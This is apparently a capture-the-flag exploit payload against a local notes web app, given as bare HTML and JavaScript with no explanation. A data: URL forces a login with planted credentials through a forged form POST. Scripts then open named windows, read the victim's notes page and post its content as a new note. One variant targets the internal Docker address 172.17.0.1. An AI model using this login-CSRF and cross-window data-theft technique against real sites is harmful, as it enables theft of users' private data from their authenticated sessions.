data:text/html,

<form action="http://0.0.0.0:8080/login" method="POST" id=sw target=_blank> 
<input value="temp" type="text" name="username"> <input value="temp" type="text" name="password">
</form>

<script>
window.open('http://0.0.0.0:8080/notes', 'flag');
setTimeout("sw.submit()", 500);
setTimeout("window.location='http://0.0.0.0:8080/notes?execute'", 1000);
</script>

data:text/html,<form action="http://0.0.0.0:8080/login" method="POST" id=sw target=_blank> <input value="temp" type="text" name="username"> <input value="temp" type="text" name="password"></form><script>window.open('http://0.0.0.0:8080/notes', 'flag');setTimeout("sw.submit()", 500);setTimeout("window.location='http://0.0.0.0:8080/notes?execute'", 1000);</script>



<script>
if(window.location.search.includes('execute')){
window.open("http://0.0.0.0:8080/new", "post");
setTimeout('window.open("", "post").document.getElementsByName("title")[0].value = "flag";window.open("", "post").document.getElementsByName("content")[0].value = window.open("", "flag").document.querySelector("p").innerText;window.open("", "post").document.forms[0].submit();', 500);
}
</script>

<script>
if(window.location.search.includes('execute')){
window.open("http://172.17.0.1:8080/new", "post");
setTimeout('window.open("", "post").document.getElementsByName("title")[0].value = "flag";window.open("", "post").document.getElementsByName("content")[0].value = window.open("", "flag").document.querySelector("p").innerText;window.open("", "post").document.forms[0].submit();', 2000);
}
</script>

window.open("", "flag").document.querySelector("p").innerText
